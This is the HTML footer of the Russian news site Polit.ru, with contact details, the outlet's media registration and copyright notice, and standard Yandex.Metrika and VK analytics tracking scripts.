        Электронная почта: <a href="mailto:politru.edit1@gmail.com" rel="nofollow">politru.edit1@gmail.com</a>
        <br/>
        Адрес: 129343, Москва, проезд Серебрякова, д.2, корп.1, 9 этаж.
        <br/>
        Телефоны: +7 495 980 1893, +7 495 980 1894.
        <br/>
        <a href="/static/price.xlsx">Стоимость услуг Полит.ру</a>
                    <!-- Yandex.Metrika counter -->
                    <div style="display:none;"><script type="text/javascript">
                    (function(w, c) {
                        (w[c] = w[c] || []).push(function() {
                            try {
                                w.yaCounter5421865 = new Ya.Metrika(5421865);
                                 yaCounter5421865.clickmap(true);
                                 yaCounter5421865.trackLinks(true);

                            } catch(e) { }
                        });
                    })(window, 'yandex_metrika_callbacks');
                    </script></div>
                    <script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"
                    defer="defer"></script>
                    <noscript><div><img src="//mc.yandex.ru/watch/5421865"
                    style="position:absolute; left:-9999px;" alt="" /></div></noscript>
                    <!-- /Yandex.Metrika counter -->
      </div>
      <div class="agelimit"></div>
      <div class="second">
        Свидетельство о регистрации средства массовой информации<br/>
        Эл. № 77-8425 от 1 декабря 2003г. Выдано министерством<br/>
        Российской Федерации по делам печати, телерадиовещания и<br/>
        средств массовой информации.
        Выходит с 21 февраля 1998 года.<br/>
        При любом использовании материалов веб-сайта ссылка на Полит.ру обязательна.<br/>
        При перепечатке в Интернете обязательна гиперссылка <a href="/">polit.ru</a>.<br/>
        Все права защищены и охраняются законом.<br/>
        © Полит.ру, 1998–2014<a rel="nofollow" href="/purge/article/2017/01/04/market/" style="text-decoration: none; color: #FFFFFF;">.</a>
      </div>
    </div>
    <div class="black-bottom stop">

    </div>
  </div>


	


    <!--END #footer-->
  <script type="text/javascript">
    (window.Image ? (new Image()) : document.createElement('img')).src = location.protocol + '//vk.com/rtrg?r=DWczk9hWeAvkw4Spq8D4hz2w1MfxfpmDx/ZgQHRFD0o641mnFqVMc*QV8joivbZSsPA/URYGFFIRCucM8ibEezf2AYNfSVMgaMW2N1cgx/flht*xh7XqKekOJqgAXuZvzaemjUVvGkCuk5jEUkCi*4*H82g4/Y64rYb2Itn*pT0-';
    load_banners();
  </script>
</body>
</html>

